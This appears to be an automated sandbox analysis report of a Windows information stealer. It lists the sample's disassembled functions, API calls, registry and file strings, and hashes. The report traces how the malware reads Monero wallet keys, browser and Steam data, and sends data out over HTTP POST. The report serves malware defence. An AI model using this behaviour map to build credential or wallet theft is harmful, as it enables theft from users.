                                                                                                                                                                                                                                                                                      • Opcode ID: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                      • Instruction ID: 1e9bd75843b12caa15a74e03b6a04fcdd02714e47b13e5b8c883d2d1c503f636
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbcf1706423a51fa9e0fb6a036ae722ad1f446616e14a0bdfbc243cc409dfbf2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40C1D3706047419BE7249F28C89476FBBE5EF81344F54093EF5829B3D1D778D8448B9A
                                                                                                                                                                                                                                                                                      Function 00410D80 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 160registrystringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410E34
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32 ref: 00410E65
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,?,?,?,?,?,?,00421509), ref: 00410F54
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410FB5
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410FBF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$EnumOpenQueryValue$lstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: - $%s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                      • API String ID: 2273887489-394048932
                                                                                                                                                                                                                                                                                      • Opcode ID: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                      • Instruction ID: a9482f3620ee90973302920576edf614ea85895da66572170e0d69f411f645d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD51A371204314ABD710AF61DC85BAFBBE9EF84744F00881EF48A97251DBB89DC5CB96
                                                                                                                                                                                                                                                                                      Function 00401480 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 212registrymemoryfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040149A
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004014B7
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004014C5
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004014DE
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004014F9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401505
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401511
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401526
                                                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401611
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,000000FF), ref: 004016DA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileHeap$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcatlstrcpylstrlenmemset
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$SOFTWARE\monero-project\monero-core$Wallets$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                      • API String ID: 288866737-733413667
                                                                                                                                                                                                                                                                                      • Opcode ID: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                                      • Instruction ID: 0f5ab2e365d18679f7850bd259ae8de3c372ef4a79097f50b908b3179d6c5dbc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2285756484b5302f54d26c5f8b61bba89344935ed41bf6c8ffe7ed6eb375a518
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70717331A10218ABCB14EFA1DD969EE7779AF48704F00405EF9016B152DBBCAEC5CBA5
                                                                                                                                                                                                                                                                                      Function 004107C0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 69registrymemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                      • String ID: CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 11
                                                                                                                                                                                                                                                                                      • API String ID: 3466090806-605346811
                                                                                                                                                                                                                                                                                      • Opcode ID: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                      • Instruction ID: 4649c964c2ac6d4717e2a874ab9f529b914844d538cc1ef61ec3e528cde88b08
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C11B271340310BBE7206B60EC4AF5BBAAAEB84B56F10402AF345E71E1C6B45C80CB99
                                                                                                                                                                                                                                                                                      Function 00417270 Relevance: 20.5, APIs: 9, Strings: 2, Instructions: 1231networkstringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,?,?,00000000,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 004172E5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00418606), ref: 004172EC
                                                                                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00418606), ref: 0041730C
                                                                                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 004175AD
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 00417682
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 004176A6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402AA0: InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402AA0: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                        • Part of subcall function 004132F0: StrCmpCA.SHLWAPI(00000000,block), ref: 00413315
                                                                                                                                                                                                                                                                                        • Part of subcall function 004132F0: ExitProcess.KERNEL32 ref: 0041331D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412C64
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412CA9
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040E440: StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,?,?,?,?), ref: 00417C10
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412E50: strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412F60: strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416FC0: lstrlenA.KERNEL32(00000000), ref: 00417011
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: RegOpenKeyExA.ADVAPI32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\ProgramData\, xrefs: 0041756F
                                                                                                                                                                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00417C0B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Open$Internet$Heaplstrcatlstrcpylstrlenstrtok_s$Process$AllocCloseCreateDirectoryEvent$ConnectExitHandleHttpInformationNameOptionQueryRequestUserValueVolumeWindowswsprintf
                                                                                                                                                                                                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$C:\ProgramData\
                                                                                                                                                                                                                                                                                      • API String ID: 818183501-1067945926
                                                                                                                                                                                                                                                                                      • Opcode ID: 894a392c71254b7d9ed5b6b1ae27d055c534c6700de8925957bfa70aa10c7508
                                                                                                                                                                                                                                                                                      • Instruction ID: d3f20ebcfaa0f86e13ddee9407f56ad69643857b77905c87f50bde3cae6408d9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 894a392c71254b7d9ed5b6b1ae27d055c534c6700de8925957bfa70aa10c7508
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43C2A331C10B599BDB11EFB5C9815EEB378BF18308F00964EE85567142EB78BAC9CB94
                                                                                                                                                                                                                                                                                      Function 0040E440 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 598COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040E740
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,opera), ref: 0040E5B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040B4E0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042150A,0042150A), ref: 0040B523
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E923
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
